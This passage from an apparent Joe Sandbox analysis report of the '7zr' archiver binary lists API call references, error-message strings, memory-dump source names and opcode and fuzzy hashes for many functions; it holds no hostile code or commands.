                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$CloseHandleObjectSingleWait
                        • String ID:
                        • API String ID: 1796208289-0
                        • Opcode ID: e2b09329811069239874746ea37dcdc804c76cecbaab48bc3c03d4c32742af43
                        • Instruction ID: 32eab559639d4a1a0c50a177afa8caaec5564cbe401b59f1db447ea38212b3c2
                        • Opcode Fuzzy Hash: e2b09329811069239874746ea37dcdc804c76cecbaab48bc3c03d4c32742af43
                        • Instruction Fuzzy Hash: 21F0F47130820547D7305ABDBC84FF766B89F55374720073BE561D22D0DE68DC818659
                        APIs
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B588B
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B58BC
                          • Part of subcall function 003BC911: GetTickCount.KERNEL32 ref: 003BC926
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$CountEnterLeaveTick
                        • String ID: v$8)D
                        • API String ID: 1056156058-2099984107
                        • Opcode ID: 730ac79e80e569e4609a52fd5c522797d918252188e0106c7e1f8c4444663455
                        • Instruction ID: fcdab92dd55b11ab5c7a049db9f333a1a4ea509b256dac1da95fa8ff769f68b6
                        • Opcode Fuzzy Hash: 730ac79e80e569e4609a52fd5c522797d918252188e0106c7e1f8c4444663455
                        • Instruction Fuzzy Hash: 3CE065B5605210EFC315EF18D948E8A37E5AF98311F02047EF6098B362CB308C49CAA9
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A209B
                          • Part of subcall function 0038757D: GetLastError.KERNEL32(0038D14C), ref: 0038757D
                          • Part of subcall function 003A2C6C: __EH_prolog.LIBCMT ref: 003A2C71
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ErrorLastfree
                        • String ID: Cannot find archive file$The item is a directory
                        • API String ID: 683690243-1569138187
                        • Opcode ID: 598838ce465af6276c4c772e1986c39f8f2c82ce7a129db804061d8dbcac0dcd
                        • Instruction ID: 45f174e1230b494df451cd6e013d55ef209df79dd0fc0dfb64581d63de46801c
                        • Opcode Fuzzy Hash: 598838ce465af6276c4c772e1986c39f8f2c82ce7a129db804061d8dbcac0dcd
                        • Instruction Fuzzy Hash: 2E722770D00258DFCB26DF68C984BDEBBB5EF5A300F15409AE859AB252C774AE81CF51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CountTickfputs
                        • String ID: .
                        • API String ID: 290905099-4150638102
                        • Opcode ID: 34798e15adb6844bd037f3d9ca24fce4211441c34f0bdf78cbf05b9e0b4e6b48
                        • Instruction ID: bd5431a71f5d311c50daf14e20f77dfcfb8499f339ada1d4340a739eb8f2037e
                        • Opcode Fuzzy Hash: 34798e15adb6844bd037f3d9ca24fce4211441c34f0bdf78cbf05b9e0b4e6b48
                        • Instruction Fuzzy Hash: 33716830620B049FDB32EF64C491AAEB7F6BF81708F01585DE6878BA41DB70B945CB11
                        APIs
                          • Part of subcall function 00389C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00389CB3
                          • Part of subcall function 00389C8F: GetProcAddress.KERNEL32(00000000), ref: 00389CBA
                          • Part of subcall function 00389C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00389CC8
                        • __aulldiv.LIBCMT ref: 003C093F
                        • __aulldiv.LIBCMT ref: 003C094B
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                        • String ID: 3333
                        • API String ID: 3520896023-2924271548
                        • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                        • Instruction ID: b3dea3985e34eecac80e4f83f48c6aa30111137a695cdeb42b798a0baca0e1ca
                        • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                        • Instruction Fuzzy Hash: 2C21D8B0A00744AEE7349F6A8881B5BBAFDEB84710F00892FA18AD3242D7709D448755
                        APIs
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        • memset.MSVCRT ref: 003AAEBA
                        • memset.MSVCRT ref: 003AAECD
                          • Part of subcall function 003C04D2: _CxxThrowException.MSVCRT(?,00434A58), ref: 003C04F8
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memset$ExceptionThrowfree
                        • String ID: Split
                        • API String ID: 1404239998-1882502421
                        • Opcode ID: 29124b6bb421a19145db7f074853f69ec1d10690c7c501e5c694e0c921f593cf
                        • Instruction ID: d1e559e46b5e68ba41d7e2abda81d61b1b1b1b9767a93c20e2e029de15e91a91
                        • Opcode Fuzzy Hash: 29124b6bb421a19145db7f074853f69ec1d10690c7c501e5c694e0c921f593cf
                        • Instruction Fuzzy Hash: F8425B31A04648DFDF26DFA4C994BADBBB5FF06304F1440A9E449AB251CB35AE85CF12
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038759F
                          • Part of subcall function 0038764C: CloseHandle.KERNELBASE(00000000,?,003875AF,00000002,?,00000000,00000000), ref: 00387657
                        • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 003875E5
                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00387626
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CreateFile$CloseH_prologHandle
                        • String ID:
                        • API String ID: 449569272-0
                        • Opcode ID: 0eee0d261d031824c692979c472633ecf6bde93eef7985d5a9382c2d1355361d
                        • Instruction ID: bffe6259634dac28be882ef6d1ffcf16fa6785cf4affc7e8afb4c47be20cd0c5
                        • Opcode Fuzzy Hash: 0eee0d261d031824c692979c472633ecf6bde93eef7985d5a9382c2d1355361d
                        • Instruction Fuzzy Hash: 9511B17280020AEFCF12AFA4DC408EEBB7AFF54354B108569F860561A1C7359E61EB50
                        APIs
                        • fputs.MSVCRT ref: 003B8437
                        • fputs.MSVCRT ref: 003B8401
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                        • __EH_prolog.LIBCMT ref: 003B83C4
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfputs$fputc
                        • String ID:
                        • API String ID: 678540050-0
                        • Opcode ID: aa58dacb12c5f9c12474e52e360d2c8c12267a4e6cfe08e6a1171098597b5c79
                        • Instruction ID: b3a5af47feda92d6d9d65672c64bc7e9d180bb77e82822fc1cafe6fdf73ff0ff
                        • Opcode Fuzzy Hash: aa58dacb12c5f9c12474e52e360d2c8c12267a4e6cfe08e6a1171098597b5c79
                        • Instruction Fuzzy Hash: 7A11E931B042159BCF07B7A1E8136AFBB7DDF44B54F50006AF6019B691CF691946CBD8
                        APIs
                        • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,003877DB,?,?,00000000,?,00387832,?), ref: 00387773
                        • GetLastError.KERNEL32(?,003877DB,?,?,00000000,?,00387832,?,?,?,?,00000000), ref: 00387780
                        • SetLastError.KERNEL32(00000000,?,?,003877DB,?,?,00000000,?,00387832,?,?,?,?,00000000), ref: 00387797
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$FilePointer
                        • String ID:
                        • API String ID: 1156039329-0
                        • Opcode ID: 86f3cc9785c87983dcf605e99b84537a57429798888882ccf71b3a4296930b17
                        • Instruction ID: 459bbee272fe9973fd4609c86b026b4f814bbd3db86836322bae88877460561e
                        • Opcode Fuzzy Hash: 86f3cc9785c87983dcf605e99b84537a57429798888882ccf71b3a4296930b17
                        • Instruction Fuzzy Hash: BB11EC30204305AFEF229F68CC85BAE7BE6AF08360F208469F81697291D7B1DD10DB60
                        APIs
                        • __EH_prolog.LIBCMT ref: 00385A91
                        • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00385AB7
                        • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00385AEC
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AttributesFile$H_prolog
                        • String ID:
                        • API String ID: 3790360811-0
                        • Opcode ID: d5466aea3172bfc25959eb82ca6b68baf561b2425f73f4b1c7f5745a2efef9eb
                        • Instruction ID: e8a203f99cb3b599cecc0576df260fc486623fec7614df2fede35f328201a2f0
                        • Opcode Fuzzy Hash: d5466aea3172bfc25959eb82ca6b68baf561b2425f73f4b1c7f5745a2efef9eb
                        • Instruction Fuzzy Hash: BA01D232E04715ABCF17BBA4A8816BEB77AEF50350F1544AAEC11A7191CB394D06EB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 00395BEF
                          • Part of subcall function 003954C0: __EH_prolog.LIBCMT ref: 003954C5
                          • Part of subcall function 00395630: __EH_prolog.LIBCMT ref: 00395635
                          • Part of subcall function 003A36EA: __EH_prolog.LIBCMT ref: 003A36EF
                          • Part of subcall function 003957C1: __EH_prolog.LIBCMT ref: 003957C6
                          • Part of subcall function 003958BE: __EH_prolog.LIBCMT ref: 003958C3
                        Strings
                        • Cannot seek to begin of file, xrefs: 0039610F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: Cannot seek to begin of file
                        • API String ID: 3519838083-2298593816
                        • Opcode ID: 3f7bb70360d508b5f608d63a2a2158d778589575e9b14edc2f9b6b7aa2230fd5
                        • Instruction ID: 860e8fffe4830a77cd42f048dd1d5ad503efcc920a6225708a9443933db05111
                        • Opcode Fuzzy Hash: 3f7bb70360d508b5f608d63a2a2158d778589575e9b14edc2f9b6b7aa2230fd5
                        • Instruction Fuzzy Hash: EA1201309047499FDF27EFA4C885BEEBBB9AF04314F14046DE4465B292CB70AE85CB51
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C4E8F
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ClearH_prologVariantfree
                        • String ID: file
                        • API String ID: 904627215-2359244304
                        • Opcode ID: 9701ef6f6242d06cd8cb6919fd86a556423c632ee0f0e7bf794712ecadc12f42
                        • Instruction ID: bff109c8bd4bc937f56b6e353d11de5a56b596d5278340bfa610cd51fbc967f9
                        • Opcode Fuzzy Hash: 9701ef6f6242d06cd8cb6919fd86a556423c632ee0f0e7bf794712ecadc12f42
                        • Instruction Fuzzy Hash: 3C124B30900649DFCF16EFA4C985FDEBBB6AF44344F2440ADE405AB252DB71AE46DB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A2CE0
                          • Part of subcall function 00385E10: __EH_prolog.LIBCMT ref: 00385E15
                          • Part of subcall function 003941EC: _CxxThrowException.MSVCRT(?,00434A58), ref: 0039421A
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                        Strings
                        • Cannot create output directory, xrefs: 003A3070
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ClearExceptionThrowVariant
                        • String ID: Cannot create output directory
                        • API String ID: 814188403-1181934277
                        • Opcode ID: 246649fe7dd5ea92ebfcfae975270bf568cd0240a14455e5910ccc5bba469994
                        • Instruction ID: cc513c72243a7a95bf4c9b1cfaf3b80bea2e1378d96389239398b8a5ac7b71ef
                        • Opcode Fuzzy Hash: 246649fe7dd5ea92ebfcfae975270bf568cd0240a14455e5910ccc5bba469994
                        • Instruction Fuzzy Hash: 52F19F30904289DFCF26EFA8C891AEEBBB5FF1A300F1540A9E44567252DB30AE45DB51
                        APIs
                        • fputs.MSVCRT ref: 003BC840
                          • Part of subcall function 003825CB: _CxxThrowException.MSVCRT(?,00434A58), ref: 003825ED
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowfputs
                        • String ID:
                        • API String ID: 1334390793-399585960
                        • Opcode ID: 404593f0a876f8f8bc7105fb619afd3dfa73d299b28e45a233cfc959c9be211a
                        • Instruction ID: 2476468414a84e96101a3d577c9e795a6ea00c7c5cdfb0b658e5979856fabc07
                        • Opcode Fuzzy Hash: 404593f0a876f8f8bc7105fb619afd3dfa73d299b28e45a233cfc959c9be211a
                        • Instruction Fuzzy Hash: 0311B2716147449FDB26CF58C8C1BAAFBE6EF49304F05446EE246CB251CBB1B904CB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Open
                        • API String ID: 1795875747-71445658
                        • Opcode ID: 1a47f71d0d4d3109ed0be189f1e8793367d6f77ce1179c2ada116472d0d209cb
                        • Instruction ID: b9842953ef5164b90b09382adf04637334a5757212f4547d6a31f9309fa80014
                        • Opcode Fuzzy Hash: 1a47f71d0d4d3109ed0be189f1e8793367d6f77ce1179c2ada116472d0d209cb
                        • Instruction Fuzzy Hash: 3511A032505704DFC722EF34D992ADABBA5EF14314F90857EE29A87212DA35A904CF64
                        APIs
                        • __EH_prolog.LIBCMT ref: 003958C3
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: a34ecd976bd83c425e063bc3c7dfda86e4388a0793cb32815fe56851f8ae8134
                        • Instruction ID: 4789a5d8e259a06a2f6a780e3bdfdfee1825bdf25a9699467675addb7714d11f
                        • Opcode Fuzzy Hash: a34ecd976bd83c425e063bc3c7dfda86e4388a0793cb32815fe56851f8ae8134
                        • Instruction Fuzzy Hash: F7910931900605DFDF27EFA4C881AEEBBB6EF44350F2540A9F942AB251DB319D85C7A4
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D06B3
                        • _CxxThrowException.MSVCRT(?,0043D480), ref: 003D08F2
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrow$H_prologmalloc
                        • String ID:
                        • API String ID: 3044594480-0
                        • Opcode ID: 5bbba6e78d9c7b44444f6255885f0e12686be8442bf1827995965f022185a750
                        • Instruction ID: 717ab9db223788907dcfb4758b1354ed9dc509f2b99fc6231ac29d0e1acf7703
                        • Opcode Fuzzy Hash: 5bbba6e78d9c7b44444f6255885f0e12686be8442bf1827995965f022185a750
                        • Instruction Fuzzy Hash: 33914A71D00249DFCB26DFA8D881BEEBBB5BF08304F15419AE459A7252C730AE45DF61
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: eb883d352cc156459c0c40b2ecd8c01a72fa530cb4f3a1800f080c21a059cf20
                        • Instruction ID: ff4b22767a32a712e116a9d80519a45361b464310a278556250164ebc34ab7cf
                        • Opcode Fuzzy Hash: eb883d352cc156459c0c40b2ecd8c01a72fa530cb4f3a1800f080c21a059cf20
                        • Instruction Fuzzy Hash: 54519F75618B40AFDF26CF64C490AEABBF5BF45304F19889DE4D64B682C730B984DB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A7B4D
                        • memcpy.MSVCRT(00000000,004427DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 003A7C65
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologmemcpy
                        • String ID:
                        • API String ID: 2991061955-0
                        • Opcode ID: f15b47e6d3043ddcb6697fac28424b9b4be0c23827cab86cec647ef5d848429a
                        • Instruction ID: 4bac30acdbe994b1f2cb62fef19f9fc48a62fdd8e58f595ce877e88876a928e7
                        • Opcode Fuzzy Hash: f15b47e6d3043ddcb6697fac28424b9b4be0c23827cab86cec647ef5d848429a
                        • Instruction Fuzzy Hash: B7419B719043189FCF22EFA4C991AEEB7F4FF05300F104469E446AB282DB30AE09CB60
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D1516
                          • Part of subcall function 003D10D3: __EH_prolog.LIBCMT ref: 003D10D8
                        • _CxxThrowException.MSVCRT(?,0043D480), ref: 003D1561
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID:
                        • API String ID: 2366012087-0
                        • Opcode ID: 582b1bfd8de64e560dd110b2bf26879d9b60ef1173dc6295048bc057dc85a4f5
                        • Instruction ID: 798438bf3035c8c0e56de5166ea2155255b723ba7d8281c1198c2fbe16c736e3
                        • Opcode Fuzzy Hash: 582b1bfd8de64e560dd110b2bf26879d9b60ef1173dc6295048bc057dc85a4f5
                        • Instruction Fuzzy Hash: 3901F232504248BFDF128F94E815BEE7FB9EF86354F04405BF4055A211C3BAA99587A0
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B5800
                        • fputs.MSVCRT ref: 003B5830
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
